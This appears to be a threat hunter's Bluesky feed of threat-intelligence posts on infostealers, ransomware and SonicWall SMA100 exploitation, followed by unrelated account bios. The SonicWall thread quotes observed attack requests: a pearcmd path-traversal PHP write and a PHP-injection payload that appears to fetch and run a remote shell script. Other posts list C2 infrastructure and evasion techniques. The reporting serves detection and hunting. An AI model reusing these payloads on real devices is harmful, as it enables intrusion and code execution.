As recent SharePoint exploits settled a bit, I wanted to analyze payload variants to understand why attackers made specific choices. ASPX for quick access, DLLs for persistence, and IIS modules for blending in.
21.08.2025 02:19 β π 0 π 0 π¬ 0 π 0
Soul instead of ShellβββPayloads with Purpose
What SharePointβs RCE May Teach Us About Payload Design and Detection/Hunt Strategy
The goal of the blog (Soul instead of Shell) is to understand constraints that force payload decisions and how they can help us detect/hunt.
Β Every payload has a soul - and understanding it makes us better hunters.
medium.com/@cyb3r-hawk/...
21.08.2025 02:18 β π 1 π 0 π¬ 1 π 0
(urlscan: page.url:http://bitbucket.org task.url:http://blogspot.com)
Hunt:
Who runs netsh + context?
How often Set-MpPreference is used?
Who creates exclusions, and when?
28.04.2025 20:40 β π 0 π 0 π¬ 0 π 0
Key TTPs:
AMSI bypass (reflection, AMSIReaper, NukeAMSI)
COM hijacking for persistence
Defender exclusions (paths/exts/procs)
UAC bypass (EnableLUA)
Firewall off (netsh)
Set-MpPreference abuse
C2: Blogspot β bitbucket redirects
28.04.2025 20:40 β π 0 π 0 π¬ 1 π 0
Recent #Xworm infections (esp. during tax season) follow a pattern:
mshta.exe β Scheduled Tasks β IEX execution.
#ThreatHunting #DetectionEngineering #MalwareAnalysis #DefenseEvasion
28.04.2025 20:40 β π 0 π 0 π¬ 2 π 0
Credential sellers: DaisyCloud (also sells RedLine stealer logs), moderdolboeb, m3g4
Distribution Locations:https://t[.]me/+seHLUhOHbVhMDM0, breachforums, cracking[.]org,hard-tm[.]su, nohide[.]space, darknetarmy[.]com, niflheim[.]world,nulledbb[.]com, niflheim[.]world.
25.04.2025 07:05 β π 0 π 0 π¬ 0 π 0
Lumma StealerβββThreat Hunting and Infrastructure Analysis
We all heard of Lumma Stealer by now and how it has positioned itself as the top infostealer market share[1] after Mirai. Its initialβ¦
Lumma Stealer is one of, if not the dominant, infostealer with a diverse distribution ecosystem from GitHub, Telegram, and multiple others. In this blog, we will look at distribution channels, credential sellers, and locations where logs are sold.
medium.com/@cyb3r-hawk/...
25.04.2025 07:04 β π 1 π 0 π¬ 1 π 0
My next post is live. In this one, we will build upon our previous theoretical introduction of the LAYER approach and see its practical implementation using BlackBasta chatleaks - specifically related to "bypassing EDR."
#cybersecurity #threathunting #thrunting #THORcollective
11.04.2025 00:27 β π 0 π 0 π¬ 0 π 0
I had fun writing this. See how treating "bypass" as a single technique creates blind spots in our hunting. We will continue this with a practical example using Blackbasta leaks
#infosec #threathunting #thrunting #blueteam #threatdetection #THORcollective
03.04.2025 15:56 β π 4 π 1 π¬ 0 π 0
A ransomware strain ("SuperBlack") by actor "Mora_001" is currently targeting two recent Fortinet zero-day vulnerabilities (CVE-2024-55591 and CVE-2025-24472). I investigated multiple intrusions between January and March, and most of them have a similar attack chain.
Read it at lnkd.in/g5fefgbq
13.03.2025 17:18 β π 0 π 0 π¬ 0 π 0
Glad to have been featured in the Cyber Focus podcast for allowing me to comment on our 2024 Threat Roundup report. we discussedΒ Key findings, Threats to critical infrastructure, OT security risks, and Threat hunting frameworks and cyber resilience
Check it out:
youtu.be/ndOpYFiabbc?...
19.02.2025 20:40 β π 0 π 0 π¬ 0 π 0
45.89.196.11
37.27.63.3
45.89.196.115 (reported in the past)
Will blog on more details.
01.02.2025 03:07 β π 0 π 0 π¬ 0 π 0
4) hxxp://45.89.196[.]115/core/sendPart - C2
Adversary Infra:
37.27.63.3:443 (kyfjlijv[.]ru) -
84.200.154.182 (not detected by VT yet)
smkuksool[.]com
2a01:4f9:3081:3098:0:0:0:2
services.ssh.server_host_key.fingerprint_sha256: 92709a98601c28a87fa307e63ae8bc60f870c6b9533a2d50bdb2c16fda205c37
01.02.2025 03:07 β π 0 π 0 π¬ 1 π 0
IP:
1) 45.89.196[.]115 - C2 and stealer panel
2) 104.22.0[.]232 - cutt[.]ly (Cloudflare)
1) hxxps://cutt[.]ly/guessintegrates - (initial URL)
2) hxxps://kyfjlijv[.]ru/guessintegrates.bat (Initial stage BAT file generated with Kodiac and zip file)
3) hxxp://45.89.196[.]115/core/createSession - C2
01.02.2025 03:06 β π 0 π 0 π¬ 1 π 0
01.02.2025 03:05 β π 0 π 0 π¬ 1 π 0
LinkedIn
This link will take you to a page thatβs not on LinkedIn
Amatera Stealer:
Following the trend of infostealers, while a recent campaign of AMOS stealer targeted macOS users (lnkd.in/gD8Da4mv), a new Windows-focused stealer called Amatera was observed during my recent intrusion analysis.
#Amatera #infoStealer #windows #telegram #crypto #cyber #security
01.02.2025 03:04 β π 0 π 0 π¬ 1 π 0
Fake Homebrew Clone Campaign: Mapping Atomic Stealerβs Infrastructure
Thereβs a clone of brew (brewe[.]sh) targeted towards Mac users via the curl command. When the user executes the curl command, it downloads an update file from norikosumiya[.]com. The downloadedβ¦
Wrote something on Atomic infostealers latest attempt to infect Mac users through cloned brew site and malicious curl command. medium.com/@cyb3r-hawk/...
#macos #Atomic #infostealer #MachO #brew #SEO #google #ads #telegram #google #Chromium #crypto #wallet #cyber #security #site #impersonation
21.01.2025 05:29 β π 0 π 0 π¬ 0 π 0
Medium
For some folks, Threat hunting research might lack a structured approach, leading to scattered and inefficient processes. This lack of structure hinders building upon previous hunts and scaling the threat hunting process effectively.
#ThreatHunting #Research #Cybersecurity
medium.com/p/90e020ffcf...
15.01.2025 20:20 β π 0 π 0 π¬ 0 π 0
LinkedIn
This link will take you to a page thatβs not on LinkedIn
Had fun writing on Chaya_003, targeting engineering workstations. It evolved from a process-killing executable analysis to an interesting investigation. The blend of technical, geopolitical, and IT-OT aspects made it even more interesting
lnkd.in/g55hiBcP
#ICS #engineering #workstations #Discord
20.12.2024 05:51 β π 0 π 0 π¬ 0 π 0
Inbox | Substack
Not every anomaly is malicious. In the post, I go over how to define success criteria and how you can embrace "false positives" when performing threat-hunting. I used user-agents analysis as an example to try and drive it home. open.substack.com/pub/cyb3rsec...
#threathunting
17.12.2024 20:26 β π 0 π 0 π¬ 0 π 0
Inbox | Substack
In my latest blog post, I showed how to use user-agent analysis in threat-hunting to spot suspicious patterns and unauthorized software using environmental knowledge and known-normal
open.substack.com/pub/cyb3rsec...
#ThreatHunting #Detection #Engineering #User #agent #analysis
11.12.2024 20:57 β π 1 π 0 π¬ 0 π 0
Required Actions:
- Update systems to version 10.2.1.14-75sv or higher
- Review and implement geographic access controls
- Enable multi-factor authentication for all users
- Scan appliance for unauthorized web shells
- Check for connections originating from the appliance
11.12.2024 06:18 β π 0 π 0 π¬ 0 π 0
IP addresses from:
- United States
- The Netherlands
- Russia
ASN providers:
- 3xK Tech GmbH
- Namecheap, Inc.
- Comcast Cable Communications, LLC
- Additional regional ISPs
11.12.2024 06:18 β π 0 π 0 π¬ 1 π 0
- Insert PHP code for execution
<host>:443/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php
11.12.2024 06:18 β π 1 π 0 π¬ 1 π 0
- Execute system commands
<host>:443/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input rule-match="<?php shell_exec(base64_decode("wd0kkgn1cmwgahr0cdovlzk0lje1ni4xnzcumta5l3noihx8ihdnzxqgahr0cdovlzk0lje1ni4xnzcumta5l3noic1plsk"
11.12.2024 06:18 β π 0 π 0 π¬ 1 π 0
The exploitation attempts include:
- Access system files remotely
Β A variant of the Mirai bot was observed attempting to access /etc/passwd through: <host>:443/cgi-bin/jarrewrite.sh
Sample hash: 464b397279bcf2d0e5ac86776166a7ca808d87570e87e37e5290b6b290ac1fc5
11.12.2024 06:18 β π 0 π 0 π¬ 1 π 0
Current Activity:
We are observing multiple attack patterns against these devices. Password spraying attempts show testing admin/administrator credentials with a small set of unknown user names
11.12.2024 06:18 β π 0 π 0 π¬ 1 π 0
SonicWall released an advisory on December 4th, SNWLID-2024-0018, that affects several SMA 100 Series devices. These devices include 500v, SMA 200, 210, 400, and 410 models running versions 10.2.1.13-72sv and earlier.
#CVE #SonicWall #SMA100 #ThreatIntel #SSL #VPN #vulnerabilities
11.12.2024 06:18 β π 0 π 0 π¬ 1 π 0
| search "thrunter"
| eval specialty="Purple Team, Treat Hunter, Lifting Heavy Things"
#Cyber Intelligence and Risk Services
Free ransomware & cybers news RSS feed: https://ecrime.ch/app/intel-news.php?rss
#ransomware #monitoring #threat
We build software for cyber #threatintelligence analysts.
https://www.dogesec.com/
GenZ told me I'm a slasher, I thought it was just ADHD.
Cyber Security/ Mentor & Coach/ Storyteller & Avid Networker/ Hobby Photographer
Google | Ideally Us | Fuckup Nights (HK)
Security Researcher & Privacy Activist.
DM are welcome for any questions.
--
Website: https://hg8.sh
Post history on Twitter: @_hg8_
#Cybersecurity #Sentinel #DefenderXDR #KQL #Azure #M365 #KQLWizard
https://detections.ai/user/KQLWizard
#Cybersecurity and #InfoSec by Trade and content creator by night for #Tech, Cybersecurity, #IT, #Linux, #AmateurRadio, and #GamingonLinux
Twitch | YouTube | TikTok | Mastodon
CISSP
Socials and Tipping: https://links.chiefgyk3d.com/socials
#OpenSource
Choose a better internet where privacy is the default. Start protecting your personal information online with Proton Mail, Proton VPN, Proton Drive, Proton Pass, Proton Wallet.
For more frequent updates, follow us here: reddit.com/r/ProtonMail
Game Dev - Streamer π Go Make Games - https://develop.games π Ferret Rescue - https://ferrets.live π Business: Pirate@sidequestmedia.com
Internet Archive is a non-profit research library preserving web pages, books, movies & audio for public access. Explore web history via the Wayback Machine.
Social networking technology created by Bluesky.
Developer-focused account. Follow @bsky.app for general announcements!
Bluesky API docs: docs.bsky.app
AT Protocol specs: atproto.com
Covering life in the future
https://www.theverge.com/subscribe
Signal is an end-to-end encrypted messaging app. Privacy isnβt an optional mode, itβs just the way that Signal works. Every message, every call, every time.
Disappointment as a Service by @codyogden.com (they/he)
ππͺπ
Matrix is an open network for secure, decentralised communication. Please support at matrix.org/support
Engineer - Founder of Adafruit - Brooklyn, NY USA - Manufacturer, open-source hardware, certified Minority and Woman-owned Business Enterprise (M/WBE) https://adafruit.com - support https://forums.adafruit.com & order/customer help support@adafruit.com
Aviation, Space and ElonJet
@elonjet.net
https://instagram.com/jacksweeney
https://grndcntrl.net/